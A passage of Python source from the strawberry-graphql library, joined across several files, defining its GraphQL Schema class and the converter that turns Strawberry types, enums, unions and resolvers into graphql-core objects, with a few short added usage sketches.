from strawberry.schema.schema_converter import GraphQLCoreConverter
from strawberry.types import ExecutionContext, ExecutionResult
from strawberry.types.graphql import OperationType
from strawberry.types.types import TypeDefinition
from strawberry.union import StrawberryUnion
from .config import StrawberryConfig
class BaseSchema(Protocol):
config: StrawberryConfig
schema_converter: GraphQLCoreConverter
query: Type
mutation: Optional[Type]
subscription: Optional[Type]
schema_directives: List[object]
@abstractmethod
async def execute(
self,
query: Optional[str],
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
allowed_operation_types: Optional[Iterable[OperationType]] = None,
) -> ExecutionResult:
raise NotImplementedError
@abstractmethod
def execute_sync(
self,
query: Optional[str],
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
allowed_operation_types: Optional[Iterable[OperationType]] = None,
) -> ExecutionResult:
raise NotImplementedError
@abstractmethod
async def subscribe(
self,
query: str,
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
) -> Any:
raise NotImplementedError
@abstractmethod
def get_type_by_name(
self, name: str
) -> Optional[
Union[TypeDefinition, ScalarDefinition, EnumDefinition, StrawberryUnion]
]:
raise NotImplementedError
@abstractmethod
@lru_cache()
def get_directive_by_name(self, graphql_name: str) -> Optional[StrawberryDirective]:
raise NotImplementedError
@abstractmethod
def as_str(self) -> str:
raise NotImplementedError
def process_errors(
self,
errors: List[GraphQLError],
execution_context: Optional[ExecutionContext] = None,
) -> None:
for error in errors:
            StrawberryLogger.error(error, execution_context)


# ---- end of file: strawberry/schema/base.py (564bff00ff_strawberry_graphql-0.168.2) ----
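
# Hedged sketch (added): process_errors is the hook that concrete schemas (and
# user subclasses) override to customise error reporting. The logging setup
# below is illustrative only.
import logging

import strawberry


class LoggingSchema(strawberry.Schema):
    def process_errors(self, errors, execution_context=None):
        for error in errors:
            # Replace StrawberryLogger with the application's own logger.
            logging.getLogger("graphql.errors").error("GraphQL error: %s", error)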
from __future__ import annotations
import warnings
from functools import lru_cache
from typing import (
TYPE_CHECKING,
Any,
AsyncIterator,
Dict,
Iterable,
List,
Optional,
Type,
Union,
cast,
)
from graphql import (
GraphQLNamedType,
GraphQLNonNull,
GraphQLSchema,
get_introspection_query,
parse,
validate_schema,
)
from graphql.subscription import subscribe
from graphql.type.directives import specified_directives
from strawberry.annotation import StrawberryAnnotation
from strawberry.extensions.directives import (
DirectivesExtension,
DirectivesExtensionSync,
)
from strawberry.schema.schema_converter import GraphQLCoreConverter
from strawberry.schema.types.scalar import DEFAULT_SCALAR_REGISTRY
from strawberry.types import ExecutionContext
from strawberry.types.graphql import OperationType
from strawberry.types.types import TypeDefinition
from ..printer import print_schema
from . import compat
from .base import BaseSchema
from .config import StrawberryConfig
from .execute import execute, execute_sync
if TYPE_CHECKING:
from graphql import ExecutionContext as GraphQLExecutionContext
from graphql import ExecutionResult as GraphQLExecutionResult
from strawberry.custom_scalar import ScalarDefinition, ScalarWrapper
from strawberry.directive import StrawberryDirective
from strawberry.enum import EnumDefinition
from strawberry.extensions import SchemaExtension
from strawberry.field import StrawberryField
from strawberry.types import ExecutionResult
from strawberry.union import StrawberryUnion
DEFAULT_ALLOWED_OPERATION_TYPES = {
OperationType.QUERY,
OperationType.MUTATION,
OperationType.SUBSCRIPTION,
}
class Schema(BaseSchema):
def __init__(
self,
        # TODO: can we make sure we only allow passing
        # something that has been decorated?
query: Type,
mutation: Optional[Type] = None,
subscription: Optional[Type] = None,
directives: Iterable[StrawberryDirective] = (),
types=(),
extensions: Iterable[Union[Type[SchemaExtension], SchemaExtension]] = (),
execution_context_class: Optional[Type[GraphQLExecutionContext]] = None,
config: Optional[StrawberryConfig] = None,
scalar_overrides: Optional[
Dict[object, Union[Type, ScalarWrapper, ScalarDefinition]]
] = None,
schema_directives: Iterable[object] = (),
):
self.query = query
self.mutation = mutation
self.subscription = subscription
self.extensions = extensions
self.execution_context_class = execution_context_class
self.config = config or StrawberryConfig()
SCALAR_OVERRIDES_DICT_TYPE = Dict[
object, Union["ScalarWrapper", "ScalarDefinition"]
]
scalar_registry: SCALAR_OVERRIDES_DICT_TYPE = {**DEFAULT_SCALAR_REGISTRY}
if scalar_overrides:
# TODO: check that the overrides are valid
scalar_registry.update(cast(SCALAR_OVERRIDES_DICT_TYPE, scalar_overrides))
self.schema_converter = GraphQLCoreConverter(self.config, scalar_registry)
self.directives = directives
self.schema_directives = list(schema_directives)
query_type = self.schema_converter.from_object(query._type_definition)
mutation_type = (
self.schema_converter.from_object(mutation._type_definition)
if mutation
else None
)
subscription_type = (
self.schema_converter.from_object(subscription._type_definition)
if subscription
else None
)
graphql_directives = [
self.schema_converter.from_directive(directive) for directive in directives
]
graphql_types = []
for type_ in types:
if compat.is_schema_directive(type_):
graphql_directives.append(
self.schema_converter.from_schema_directive(type_)
)
else:
if hasattr(type_, "_type_definition"):
if type_._type_definition.is_generic:
type_ = StrawberryAnnotation(type_).resolve() # noqa: PLW2901
graphql_type = self.schema_converter.from_maybe_optional(type_)
if isinstance(graphql_type, GraphQLNonNull):
graphql_type = graphql_type.of_type
if not isinstance(graphql_type, GraphQLNamedType):
raise TypeError(f"{graphql_type} is not a named GraphQL Type")
graphql_types.append(graphql_type)
try:
self._schema = GraphQLSchema(
query=query_type,
mutation=mutation_type,
subscription=subscription_type if subscription else None,
directives=specified_directives + tuple(graphql_directives),
types=graphql_types,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: self,
},
)
except TypeError as error:
# GraphQL core throws a TypeError if there's any exception raised
# during the schema creation, so we check if the cause was a
            # StrawberryException and raise it instead if that's the case.
from strawberry.exceptions import StrawberryException
if isinstance(error.__cause__, StrawberryException):
raise error.__cause__ from None
raise
# attach our schema to the GraphQL schema instance
self._schema._strawberry_schema = self # type: ignore
self._warn_for_federation_directives()
# Validate schema early because we want developers to know about
# possible issues as soon as possible
errors = validate_schema(self._schema)
if errors:
formatted_errors = "\n\n".join(f"❌ {error.message}" for error in errors)
raise ValueError(f"Invalid Schema. Errors:\n\n{formatted_errors}")
def get_extensions(
self, sync: bool = False
) -> List[Union[Type[SchemaExtension], SchemaExtension]]:
extensions = list(self.extensions)
if self.directives:
extensions.append(DirectivesExtensionSync if sync else DirectivesExtension)
return extensions
@lru_cache()
def get_type_by_name(
self, name: str
) -> Optional[
Union[TypeDefinition, ScalarDefinition, EnumDefinition, StrawberryUnion]
]:
# TODO: respect auto_camel_case
if name in self.schema_converter.type_map:
return self.schema_converter.type_map[name].definition
return None
def get_field_for_type(
self, field_name: str, type_name: str
) -> Optional[StrawberryField]:
type_ = self.get_type_by_name(type_name)
if not type_:
return None # pragma: no cover
assert isinstance(type_, TypeDefinition)
return next(
(
field
for field in type_.fields
if self.config.name_converter.get_graphql_name(field) == field_name
),
None,
)
@lru_cache()
def get_directive_by_name(self, graphql_name: str) -> Optional[StrawberryDirective]:
return next(
(
directive
for directive in self.directives
if self.config.name_converter.from_directive(directive) == graphql_name
),
None,
)
async def execute(
self,
query: Optional[str],
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
allowed_operation_types: Optional[Iterable[OperationType]] = None,
) -> ExecutionResult:
if allowed_operation_types is None:
allowed_operation_types = DEFAULT_ALLOWED_OPERATION_TYPES
# Create execution context
execution_context = ExecutionContext(
query=query,
schema=self,
context=context_value,
root_value=root_value,
variables=variable_values,
provided_operation_name=operation_name,
)
result = await execute(
self._schema,
extensions=self.get_extensions(),
execution_context_class=self.execution_context_class,
execution_context=execution_context,
allowed_operation_types=allowed_operation_types,
process_errors=self.process_errors,
)
return result
def execute_sync(
self,
query: Optional[str],
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
allowed_operation_types: Optional[Iterable[OperationType]] = None,
) -> ExecutionResult:
if allowed_operation_types is None:
allowed_operation_types = DEFAULT_ALLOWED_OPERATION_TYPES
execution_context = ExecutionContext(
query=query,
schema=self,
context=context_value,
root_value=root_value,
variables=variable_values,
provided_operation_name=operation_name,
)
result = execute_sync(
self._schema,
extensions=self.get_extensions(sync=True),
execution_context_class=self.execution_context_class,
execution_context=execution_context,
allowed_operation_types=allowed_operation_types,
process_errors=self.process_errors,
)
return result
async def subscribe(
self,
# TODO: make this optional when we support extensions
query: str,
variable_values: Optional[Dict[str, Any]] = None,
context_value: Optional[Any] = None,
root_value: Optional[Any] = None,
operation_name: Optional[str] = None,
) -> Union[AsyncIterator[GraphQLExecutionResult], GraphQLExecutionResult]:
return await subscribe(
self._schema,
parse(query),
root_value=root_value,
context_value=context_value,
variable_values=variable_values,
operation_name=operation_name,
)
def _warn_for_federation_directives(self):
"""Raises a warning if the schema has any federation directives."""
from strawberry.federation.schema_directives import FederationDirective
all_types = self.schema_converter.type_map.values()
all_type_defs = (type_.definition for type_ in all_types)
all_directives = (
directive
for type_def in all_type_defs
for directive in (type_def.directives or [])
)
if any(
isinstance(directive, FederationDirective) for directive in all_directives
):
warnings.warn(
"Federation directive found in schema. "
"Use `strawberry.federation.Schema` instead of `strawberry.Schema`.",
UserWarning,
stacklevel=3,
)
def as_str(self) -> str:
return print_schema(self)
__str__ = as_str
def introspect(self) -> Dict[str, Any]:
"""Return the introspection query result for the current schema
Raises:
ValueError: If the introspection query fails due to an invalid schema
"""
introspection = self.execute_sync(get_introspection_query())
if introspection.errors or not introspection.data:
raise ValueError(f"Invalid Schema. Errors {introspection.errors!r}")
        return introspection.data


# ---- end of file: strawberry/schema/schema.py (564bff00ff_strawberry_graphql-0.168.2) ----
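
# Hedged usage sketch (added) for the Schema class above; Book and Query are
# hypothetical example types.
import strawberry


@strawberry.type
class Book:
    title: str


@strawberry.type
class Query:
    @strawberry.field
    def book(self) -> Book:
        return Book(title="Strawberry")


schema = strawberry.Schema(query=Query)

print(schema)  # __str__ is aliased to as_str(), i.e. the printed SDL

introspection = schema.introspect()  # raises ValueError if the query fails
assert "__schema" in introspection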
from __future__ import annotations
import dataclasses
import sys
from functools import partial, reduce
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
List,
Optional,
Tuple,
Type,
TypeVar,
Union,
cast,
)
from graphql import (
GraphQLArgument,
GraphQLDirective,
GraphQLEnumType,
GraphQLEnumValue,
GraphQLField,
GraphQLInputField,
GraphQLInputObjectType,
GraphQLInterfaceType,
GraphQLList,
GraphQLNonNull,
GraphQLObjectType,
GraphQLUnionType,
Undefined,
)
from graphql.language.directive_locations import DirectiveLocation
from strawberry.annotation import StrawberryAnnotation
from strawberry.arguments import StrawberryArgument, convert_arguments
from strawberry.custom_scalar import ScalarWrapper
from strawberry.enum import EnumDefinition
from strawberry.exceptions import (
DuplicatedTypeName,
InvalidTypeInputForUnion,
InvalidUnionTypeError,
MissingTypesForGenericError,
ScalarAlreadyRegisteredError,
UnresolvedFieldTypeError,
)
from strawberry.field import UNRESOLVED
from strawberry.lazy_type import LazyType
from strawberry.private import is_private
from strawberry.schema.types.scalar import _make_scalar_type
from strawberry.type import StrawberryList, StrawberryOptional
from strawberry.types.info import Info
from strawberry.types.types import TypeDefinition
from strawberry.union import StrawberryUnion
from strawberry.unset import UNSET
from strawberry.utils.await_maybe import await_maybe
from ..extensions.field_extension import build_field_extension_resolvers
from . import compat
from .types.concrete_type import ConcreteType
if TYPE_CHECKING:
from graphql import (
GraphQLInputType,
GraphQLNullableType,
GraphQLOutputType,
GraphQLResolveInfo,
GraphQLScalarType,
ValueNode,
)
from strawberry.custom_scalar import ScalarDefinition
from strawberry.directive import StrawberryDirective
from strawberry.enum import EnumValue
from strawberry.field import StrawberryField
from strawberry.schema.config import StrawberryConfig
from strawberry.schema_directive import StrawberrySchemaDirective
from strawberry.type import StrawberryType
# graphql-core expects a resolver for an Enum type to return
# the enum's *value* (not its name or an instance of the enum). We have to
# subclass the GraphQLEnumType class to enable returning Enum members from
# resolvers.
class CustomGraphQLEnumType(GraphQLEnumType):
def __init__(self, enum: EnumDefinition, *args, **kwargs):
super().__init__(*args, **kwargs)
self.wrapped_cls = enum.wrapped_cls
def serialize(self, output_value: Any) -> str:
if isinstance(output_value, self.wrapped_cls):
return output_value.name
return super().serialize(output_value)
def parse_value(self, input_value: str) -> Any:
return self.wrapped_cls(super().parse_value(input_value))
def parse_literal(
self, value_node: ValueNode, _variables: Optional[Dict[str, Any]] = None
) -> Any:
return self.wrapped_cls(super().parse_literal(value_node, _variables))
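
# Hedged sketch (added) of what CustomGraphQLEnumType above enables: resolvers on
# a strawberry schema can return enum *members*, which are serialised by name.
# Flavour and Query are hypothetical example types.
from enum import Enum

import strawberry


@strawberry.enum
class Flavour(Enum):
    STRAWBERRY = "strawberry"
    VANILLA = "vanilla"


@strawberry.type
class Query:
    @strawberry.field
    def flavour(self) -> Flavour:
        return Flavour.STRAWBERRY  # the member itself, not its .value


schema = strawberry.Schema(query=Query)
result = schema.execute_sync("{ flavour }")
assert result.data == {"flavour": "STRAWBERRY"}  # serialised as the member name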
class GraphQLCoreConverter:
# TODO: Make abstract
# Extension key used to link a GraphQLType back into the Strawberry definition
DEFINITION_BACKREF = "strawberry-definition"
def __init__(
self,
config: StrawberryConfig,
scalar_registry: Dict[object, Union[ScalarWrapper, ScalarDefinition]],
):
self.type_map: Dict[str, ConcreteType] = {}
self.config = config
self.scalar_registry = scalar_registry
def from_argument(self, argument: StrawberryArgument) -> GraphQLArgument:
argument_type = cast(
"GraphQLInputType", self.from_maybe_optional(argument.type)
)
default_value = Undefined if argument.default is UNSET else argument.default
return GraphQLArgument(
type_=argument_type,
default_value=default_value,
description=argument.description,
deprecation_reason=argument.deprecation_reason,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: argument,
},
)
def from_enum(self, enum: EnumDefinition) -> CustomGraphQLEnumType:
enum_name = self.config.name_converter.from_type(enum)
assert enum_name is not None
# Don't reevaluate known types
cached_type = self.type_map.get(enum_name, None)
if cached_type:
self.validate_same_type_definition(enum_name, enum, cached_type)
graphql_enum = cached_type.implementation
assert isinstance(graphql_enum, CustomGraphQLEnumType) # For mypy
return graphql_enum
graphql_enum = CustomGraphQLEnumType(
enum=enum,
name=enum_name,
values={item.name: self.from_enum_value(item) for item in enum.values},
description=enum.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: enum,
},
)
self.type_map[enum_name] = ConcreteType(
definition=enum, implementation=graphql_enum
)
return graphql_enum
def from_enum_value(self, enum_value: EnumValue) -> GraphQLEnumValue:
return GraphQLEnumValue(
enum_value.value,
deprecation_reason=enum_value.deprecation_reason,
description=enum_value.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: enum_value,
},
)
def from_directive(self, directive: StrawberryDirective) -> GraphQLDirective:
graphql_arguments = {}
for argument in directive.arguments:
argument_name = self.config.name_converter.from_argument(argument)
graphql_arguments[argument_name] = self.from_argument(argument)
directive_name = self.config.name_converter.from_type(directive)
return GraphQLDirective(
name=directive_name,
locations=directive.locations,
args=graphql_arguments,
description=directive.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: directive,
},
)
def from_schema_directive(self, cls: Type) -> GraphQLDirective:
strawberry_directive = cast(
"StrawberrySchemaDirective", cls.__strawberry_directive__
)
module = sys.modules[cls.__module__]
args: Dict[str, GraphQLArgument] = {}
for field in strawberry_directive.fields:
default = field.default
if default == dataclasses.MISSING:
default = UNSET
name = self.config.name_converter.get_graphql_name(field)
args[name] = self.from_argument(
StrawberryArgument(
python_name=field.python_name or field.name,
graphql_name=None,
type_annotation=StrawberryAnnotation(
annotation=field.type,
namespace=module.__dict__,
),
default=default,
)
)
return GraphQLDirective(
name=self.config.name_converter.from_directive(strawberry_directive),
locations=[
DirectiveLocation(loc.value) for loc in strawberry_directive.locations
],
args=args,
is_repeatable=strawberry_directive.repeatable,
description=strawberry_directive.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: strawberry_directive,
},
)
def from_field(self, field: StrawberryField) -> GraphQLField:
field_type = cast("GraphQLOutputType", self.from_maybe_optional(field.type))
resolver = self.from_resolver(field)
subscribe = None
if field.is_subscription:
subscribe = resolver
resolver = lambda event, *_, **__: event # noqa: E731
graphql_arguments = {}
for argument in field.arguments:
argument_name = self.config.name_converter.from_argument(argument)
graphql_arguments[argument_name] = self.from_argument(argument)
return GraphQLField(
type_=field_type,
args=graphql_arguments,
resolve=resolver,
subscribe=subscribe,
description=field.description,
deprecation_reason=field.deprecation_reason,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: field,
},
)
def from_input_field(self, field: StrawberryField) -> GraphQLInputField:
field_type = cast("GraphQLInputType", self.from_maybe_optional(field.type))
default_value: object
if field.default_value is UNSET or field.default_value is dataclasses.MISSING:
default_value = Undefined
else:
default_value = field.default_value
return GraphQLInputField(
type_=field_type,
default_value=default_value,
description=field.description,
deprecation_reason=field.deprecation_reason,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: field,
},
)
FieldType = TypeVar("FieldType", GraphQLField, GraphQLInputField)
@staticmethod
def _get_thunk_mapping(
type_definition: TypeDefinition,
name_converter: Callable[[StrawberryField], str],
field_converter: Callable[[StrawberryField], FieldType],
) -> Dict[str, FieldType]:
"""Create a GraphQL core `ThunkMapping` mapping of field names to field types.
This method filters out remaining `strawberry.Private` annotated fields that
could not be filtered during the initialization of a `TypeDefinition` due to
postponed type-hint evaluation (PEP-563). Performing this filtering now (at
        schema conversion time) ensures that all types to be included in the schema
        have already been resolved.
Raises:
TypeError: If the type of a field in ``fields`` is `UNRESOLVED`
"""
thunk_mapping = {}
for field in type_definition.fields:
if field.type is UNRESOLVED:
raise UnresolvedFieldTypeError(type_definition, field)
if not is_private(field.type):
thunk_mapping[name_converter(field)] = field_converter(field)
return thunk_mapping
def get_graphql_fields(
self, type_definition: TypeDefinition
) -> Dict[str, GraphQLField]:
return self._get_thunk_mapping(
type_definition=type_definition,
name_converter=self.config.name_converter.from_field,
field_converter=self.from_field,
)
def get_graphql_input_fields(
self, type_definition: TypeDefinition
) -> Dict[str, GraphQLInputField]:
return self._get_thunk_mapping(
type_definition=type_definition,
name_converter=self.config.name_converter.from_field,
field_converter=self.from_input_field,
)
def from_input_object(self, object_type: type) -> GraphQLInputObjectType:
type_definition = object_type._type_definition # type: ignore
type_name = self.config.name_converter.from_type(type_definition)
# Don't reevaluate known types
cached_type = self.type_map.get(type_name, None)
if cached_type:
self.validate_same_type_definition(type_name, type_definition, cached_type)
graphql_object_type = self.type_map[type_name].implementation
assert isinstance(graphql_object_type, GraphQLInputObjectType) # For mypy
return graphql_object_type
graphql_object_type = GraphQLInputObjectType(
name=type_name,
fields=lambda: self.get_graphql_input_fields(type_definition),
description=type_definition.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: type_definition,
},
)
self.type_map[type_name] = ConcreteType(
definition=type_definition, implementation=graphql_object_type
)
return graphql_object_type
def from_interface(self, interface: TypeDefinition) -> GraphQLInterfaceType:
# TODO: Use StrawberryInterface when it's implemented in another PR
interface_name = self.config.name_converter.from_type(interface)
# Don't reevaluate known types
cached_type = self.type_map.get(interface_name, None)
if cached_type:
self.validate_same_type_definition(interface_name, interface, cached_type)
graphql_interface = cached_type.implementation
assert isinstance(graphql_interface, GraphQLInterfaceType) # For mypy
return graphql_interface
graphql_interface = GraphQLInterfaceType(
name=interface_name,
fields=lambda: self.get_graphql_fields(interface),
interfaces=list(map(self.from_interface, interface.interfaces)),
description=interface.description,
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: interface,
},
)
self.type_map[interface_name] = ConcreteType(
definition=interface, implementation=graphql_interface
)
return graphql_interface
def from_list(self, type_: StrawberryList) -> GraphQLList:
of_type = self.from_maybe_optional(type_.of_type)
return GraphQLList(of_type)
def from_object(self, object_type: TypeDefinition) -> GraphQLObjectType:
# TODO: Use StrawberryObjectType when it's implemented in another PR
object_type_name = self.config.name_converter.from_type(object_type)
# Don't reevaluate known types
cached_type = self.type_map.get(object_type_name, None)
if cached_type:
self.validate_same_type_definition(
object_type_name, object_type, cached_type
)
graphql_object_type = cached_type.implementation
assert isinstance(graphql_object_type, GraphQLObjectType) # For mypy
return graphql_object_type
def _get_is_type_of() -> Optional[Callable[[Any, GraphQLResolveInfo], bool]]:
if object_type.is_type_of:
return object_type.is_type_of
if not object_type.interfaces:
return None
def is_type_of(obj: Any, _info: GraphQLResolveInfo) -> bool:
if object_type.concrete_of and (
hasattr(obj, "_type_definition")
and obj._type_definition.origin is object_type.concrete_of.origin
):
return True
return isinstance(obj, object_type.origin)
return is_type_of
graphql_object_type = GraphQLObjectType(
name=object_type_name,
fields=lambda: self.get_graphql_fields(object_type),
interfaces=list(map(self.from_interface, object_type.interfaces)),
description=object_type.description,
is_type_of=_get_is_type_of(),
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: object_type,
},
)
self.type_map[object_type_name] = ConcreteType(
definition=object_type, implementation=graphql_object_type
)
return graphql_object_type
def from_resolver(
self, field: StrawberryField
) -> Callable: # TODO: Take StrawberryResolver
field.default_resolver = self.config.default_resolver
if field.is_basic_field:
def _get_basic_result(_source: Any, *args, **kwargs):
# Call `get_result` without an info object or any args or
# kwargs because this is a basic field with no resolver.
return field.get_result(_source, info=None, args=[], kwargs={})
_get_basic_result._is_default = True # type: ignore
return _get_basic_result
def _get_arguments(
source: Any,
info: Info,
kwargs: Dict[str, Any],
) -> Tuple[List[Any], Dict[str, Any]]:
kwargs = convert_arguments(
kwargs,
field.arguments,
scalar_registry=self.scalar_registry,
config=self.config,
)
# the following code allows omitting the info and root arguments
# by inspecting the original resolver arguments,
# if it asks for self, the source will be passed as first argument
# if it asks for root, the source will be passed as kwarg
# if it asks for info, the info will be passed as kwarg
args = []
if field.base_resolver:
if field.base_resolver.self_parameter:
args.append(source)
root_parameter = field.base_resolver.root_parameter
if root_parameter:
kwargs[root_parameter.name] = source
info_parameter = field.base_resolver.info_parameter
if info_parameter:
kwargs[info_parameter.name] = info
return args, kwargs
def _check_permissions(source: Any, info: Info, kwargs: Dict[str, Any]):
"""
Checks if the permission should be accepted and
raises an exception if not
"""
for permission_class in field.permission_classes:
permission = permission_class()
if not permission.has_permission(source, info, **kwargs):
message = getattr(permission, "message", None)
raise PermissionError(message)
async def _check_permissions_async(
source: Any, info: Info, kwargs: Dict[str, Any]
):
for permission_class in field.permission_classes:
permission = permission_class()
has_permission: bool
has_permission = await await_maybe(
permission.has_permission(source, info, **kwargs)
)
if not has_permission:
message = getattr(permission, "message", None)
raise PermissionError(message)
def _strawberry_info_from_graphql(info: GraphQLResolveInfo) -> Info:
return Info(
_raw_info=info,
_field=field,
)
def _get_result(_source: Any, info: Info, **kwargs):
field_args, field_kwargs = _get_arguments(
source=_source, info=info, kwargs=kwargs
)
return field.get_result(
_source, info=info, args=field_args, kwargs=field_kwargs
)
def wrap_field_extensions() -> Callable[..., Any]:
"""Wrap the provided field resolver with the middleware."""
if not field.extensions:
return _get_result
for extension in field.extensions:
extension.apply(field)
extension_functions = build_field_extension_resolvers(field)
return reduce(
lambda chained_fns, next_fn: partial(next_fn, chained_fns),
extension_functions,
_get_result,
)
_get_result_with_extensions = wrap_field_extensions()
def _resolver(_source: Any, info: GraphQLResolveInfo, **kwargs):
strawberry_info = _strawberry_info_from_graphql(info)
_check_permissions(_source, strawberry_info, kwargs)
return _get_result_with_extensions(_source, strawberry_info, **kwargs)
async def _async_resolver(_source: Any, info: GraphQLResolveInfo, **kwargs):
strawberry_info = _strawberry_info_from_graphql(info)
await _check_permissions_async(_source, strawberry_info, kwargs)
return await await_maybe(
_get_result_with_extensions(_source, strawberry_info, **kwargs)
)
if field.is_async:
_async_resolver._is_default = not field.base_resolver # type: ignore
return _async_resolver
else:
_resolver._is_default = not field.base_resolver # type: ignore
return _resolver
def from_scalar(self, scalar: Type) -> GraphQLScalarType:
scalar_definition: ScalarDefinition
if scalar in self.scalar_registry:
_scalar_definition = self.scalar_registry[scalar]
# TODO: check why we need the cast and we are not trying with getattr first
if isinstance(_scalar_definition, ScalarWrapper):
scalar_definition = _scalar_definition._scalar_definition
else:
scalar_definition = _scalar_definition
else:
scalar_definition = scalar._scalar_definition
scalar_name = self.config.name_converter.from_type(scalar_definition)
if scalar_name not in self.type_map:
implementation = (
scalar_definition.implementation
if scalar_definition.implementation is not None
else _make_scalar_type(scalar_definition)
)
self.type_map[scalar_name] = ConcreteType(
definition=scalar_definition, implementation=implementation
)
else:
other_definition = self.type_map[scalar_name].definition
# TODO: the other definition might not be a scalar, we should
# handle this case better, since right now we assume it is a scalar
if other_definition != scalar_definition:
other_definition = cast("ScalarDefinition", other_definition)
raise ScalarAlreadyRegisteredError(scalar_definition, other_definition)
implementation = cast(
"GraphQLScalarType", self.type_map[scalar_name].implementation
)
return implementation
def from_maybe_optional(
self, type_: Union[StrawberryType, type]
) -> Union[GraphQLNullableType, GraphQLNonNull]:
NoneType = type(None)
if type_ is None or type_ is NoneType:
return self.from_type(type_)
elif isinstance(type_, StrawberryOptional):
return self.from_type(type_.of_type)
else:
return GraphQLNonNull(self.from_type(type_))
def from_type(self, type_: Union[StrawberryType, type]) -> GraphQLNullableType:
if compat.is_generic(type_):
raise MissingTypesForGenericError(type_)
if isinstance(type_, EnumDefinition): # TODO: Replace with StrawberryEnum
return self.from_enum(type_)
elif compat.is_input_type(type_): # TODO: Replace with StrawberryInputObject
return self.from_input_object(type_)
elif isinstance(type_, StrawberryList):
return self.from_list(type_)
elif compat.is_interface_type(type_): # TODO: Replace with StrawberryInterface
type_definition: TypeDefinition = type_._type_definition # type: ignore
return self.from_interface(type_definition)
elif compat.is_object_type(type_): # TODO: Replace with StrawberryObject
type_definition: TypeDefinition = type_._type_definition # type: ignore
return self.from_object(type_definition)
elif compat.is_enum(type_): # TODO: Replace with StrawberryEnum
enum_definition: EnumDefinition = type_._enum_definition # type: ignore
return self.from_enum(enum_definition)
elif isinstance(type_, TypeDefinition): # TODO: Replace with StrawberryObject
return self.from_object(type_)
elif isinstance(type_, StrawberryUnion):
return self.from_union(type_)
elif isinstance(type_, LazyType):
return self.from_type(type_.resolve_type())
elif compat.is_scalar(
type_, self.scalar_registry
): # TODO: Replace with StrawberryScalar
return self.from_scalar(type_)
raise TypeError(f"Unexpected type '{type_}'")
def from_union(self, union: StrawberryUnion) -> GraphQLUnionType:
union_name = self.config.name_converter.from_type(union)
for type_ in union.types:
# This check also occurs in the Annotation resolving, but because of
# TypeVars, Annotations, LazyTypes, etc it can't perfectly detect issues at
# that stage
if not StrawberryUnion.is_valid_union_type(type_):
raise InvalidUnionTypeError(union_name, type_)
# Don't reevaluate known types
if union_name in self.type_map:
graphql_union = self.type_map[union_name].implementation
assert isinstance(graphql_union, GraphQLUnionType) # For mypy
return graphql_union
graphql_types: List[GraphQLObjectType] = []
for type_ in union.types:
graphql_type = self.from_type(type_)
if isinstance(graphql_type, GraphQLInputObjectType):
raise InvalidTypeInputForUnion(graphql_type)
assert isinstance(graphql_type, GraphQLObjectType)
graphql_types.append(graphql_type)
graphql_union = GraphQLUnionType(
name=union_name,
types=graphql_types,
description=union.description,
resolve_type=union.get_type_resolver(self.type_map),
extensions={
GraphQLCoreConverter.DEFINITION_BACKREF: union,
},
)
self.type_map[union_name] = ConcreteType(
definition=union, implementation=graphql_union
)
return graphql_union
def _get_is_type_of(
self,
object_type: TypeDefinition,
) -> Optional[Callable[[Any, GraphQLResolveInfo], bool]]:
if object_type.is_type_of:
return object_type.is_type_of
if object_type.interfaces:
def is_type_of(obj: Any, _info: GraphQLResolveInfo) -> bool:
if object_type.concrete_of and (
hasattr(obj, "_type_definition")
and obj._type_definition.origin is object_type.concrete_of.origin
):
return True
return isinstance(obj, object_type.origin)
return is_type_of
return None
def validate_same_type_definition(
self, name: str, type_definition: StrawberryType, cached_type: ConcreteType
) -> None:
# if the type definitions are the same we can return
if cached_type.definition == type_definition:
return
# otherwise we need to check if we are dealing with different instances
# of the same generic type. This happens when using the same generic
# type in different places in the schema, like in the following example:
# >>> @strawberry.type
# >>> class A(Generic[T]):
# >>> a: T
# >>> @strawberry.type
# >>> class Query:
# >>> first: A[int]
# >>> second: A[int]
# in theory we won't ever have duplicated definitions for the same generic,
# but we are doing the check in an exhaustive way just in case we missed
# something.
# we only do this check for TypeDefinitions, as they are the only ones
# that can be generic.
# if they are of the same generic type, we need to check if the type
# var map is the same, in that case we can return
if (
isinstance(type_definition, TypeDefinition)
and isinstance(cached_type.definition, TypeDefinition)
and cached_type.definition.concrete_of is not None
and cached_type.definition.concrete_of == type_definition.concrete_of
and (
cached_type.definition.type_var_map.keys()
== type_definition.type_var_map.keys()
)
):
# manually compare type_var_maps while resolving any lazy types
# so that they're considered equal to the actual types they're referencing
equal = True
lazy_types = False
for type_var, type1 in cached_type.definition.type_var_map.items():
type2 = type_definition.type_var_map[type_var]
# both lazy types are always resolved because two different lazy types
# may be referencing the same actual type
if isinstance(type1, LazyType):
type1 = type1.resolve_type() # noqa: PLW2901
lazy_types = True
elif isinstance(type1, StrawberryOptional) and isinstance(
type1.of_type, LazyType
):
lazy_types = True
type1.of_type = type1.of_type.resolve_type()
if isinstance(type2, LazyType):
type2 = type2.resolve_type()
lazy_types = True
elif isinstance(type2, StrawberryOptional) and isinstance(
type2.of_type, LazyType
):
type2.of_type = type2.of_type.resolve_type()
lazy_types = True
if lazy_types and type1 != type2:
equal = False
break
if equal:
return
if isinstance(type_definition, TypeDefinition):
first_origin = type_definition.origin
elif isinstance(type_definition, EnumDefinition):
first_origin = type_definition.wrapped_cls
else:
first_origin = None
